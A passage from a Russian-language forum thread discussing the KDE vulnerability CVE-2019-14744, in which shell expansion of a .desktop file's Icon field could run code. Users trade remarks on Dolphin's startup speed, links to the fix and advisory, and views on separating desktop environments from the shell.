Да его я уже даже и не помню когда отключил.

> шАры, маунты и прочее. И превьюхи, само собой.

Превьюхи никак не влияют, я проверил, потомушо обновляются уже после появления окна.
> Но вообще Dolphin и у меня стартует до 5 секунд.

Вот в этом и проблема же, а ты всё "руки помой и будет скорость" ;)

Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

121. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от AlexYeCu_not_logged (?), 09-Авг-19, 00:20 
>Долго запускается? Это на каком древнейшем железе?

На любом.
Там что-то навертели в последних релизах, так он даже с ssd может сартовать секунд 8 или 9. Причём не всегда, а после некоторого простоя: после долгого запуска гачинает опять почти мгновенно стартовать. Не запускать некоторое время — может опять длинный запуск быть, а может и не быть. Даже при уже запущенной копии может долгий запуск быть. С чем связано — никто не знает. Сетевые каталоги другую картину дают обычно — запускается сразу, но может «тупить», если они не доступны. Многие пользователи грешили на настройки самбы, но нет. Очищение всевозможных кэшей тоже эффект не дало. В консоли только безуспешные поиски каталога tags:, причём при любом запуске, хоть быстром, хоть медленном. Индексеры и так всегда отключены. Загадка, в общем.
Не начни разраб Nemo косплеить аутиста — свалил бы с Dolphin-а.

Ответить | Правка | ^ к родителю #77 | Наверх | Cообщить модератору

76. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (76), 07-Авг-19, 17:21 
Переходите на QubesOS и не парьтесь
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

107. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Dmitry77 (ok), 08-Авг-19, 08:31 
А там этого бага нет?
Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

80. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –1 +/
Сообщение от Аноним (80), 07-Авг-19, 18:23 
с почином
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

86. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –3 +/
Сообщение от Анонимно (?), 07-Авг-19, 20:26 
Линукс безопасен, говорили они...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

95. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  –4 +/
Сообщение от neAnonim (?), 07-Авг-19, 22:55 
А потом пришли шифровальщики, .rhost, выполнения кода при взгляде на иконку... популярность пришла. (Когда пользователи начнут еще и платить в стим, а не просто ставить, тогда начнется )
Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

99. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от anonymous (??), 08-Авг-19, 07:15 
Да вроде бы только ленивый не говорил, что userspace-комбайны -- это бажно и небезопасно.
Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

116. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним 80_уровня (ok), 08-Авг-19, 15:58 
Где-то нахмурился один Лёня.
Ответить | Правка | ^ к родителю #99 | Наверх | Cообщить модератору

106. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Dmitry77 (ok), 08-Авг-19, 08:31 
Интересно кто является коммитером этого бага?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

112. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (112), 08-Авг-19, 12:26 
CVE-2019-14744
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

113. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Георгийemail (??), 08-Авг-19, 12:28 
Исправлено
https://cgit.kde.org/kconfig.git/commit/?id=5d3e71b1d2ecd2cb...

В версии kconfig 5.61.
https://kde.org/info/security/advisory-20190807-1.txt

Сейчас в KDE Neon еще 5.60. Не знаю, есть ли там этот патч в текущей сборке.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

118. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от InuYasha (?), 08-Авг-19, 21:26 
Вот к чему приводит тяга к копанию в контенте вместо его отображения!
А вы удивляетесь, почему современные фэйл-менеджеры такие торомзные!
Отрубить нахрен все превьюхи. Хотя, конечно, даже в имени файла может закрасться эксплоит (по-моему, такое было в макоси или подобном).
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

123. "Уязвимость в KDE, позволяющая выполнить код при просмотре сп..."  +/
Сообщение от Аноним (123), 09-Авг-19, 12:26 
Давайте попробуем разобраться без злорадства.

> Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функцию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды.

Эта проблема не частный случай касающийся конкретного куска KDE. Это вообще проблема взаимоотношения DE и оболочки. Сегодня (10 лет назад) на этом споткнулся один разраб, а завтра споткнётся другой. Чтобы обратиться к ресурсному файлу (Icon - явно ресурс) необходимо открыть файл на чтение и прочитать данные +/- какое-то смещение. А тут не просто выполнением занимаются, тут ради иконки запустили целую оболочку! Подумайте, как просто разработчику добраться из графики в оболочку и совершить похожую ошибку.

Тут уже многие писали, что в венде были похожие уязвимости. Я же скажу что этот архитектурный недочет был внутри Win9x. Надо полностью отлучать графику от оболочки. Нужно, чтобы для работы графических API нужно было явно создавать новые экземпляры оболочки, если разработчик хочет запустить скрипт. И тут важно понять разницу между "запустить файл оболочки" и проинстанцировать. В первом случае для запуска оболочки требуется оболочка, а во втором случае создаётся экземпляр оболочки.

Когда оболочку решили убрать из системы инициализации... до сих пор вонь повсюду. А представьте если отлучить её от приложений и целиком завернуть в API... это уже Linux NT какой-то.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру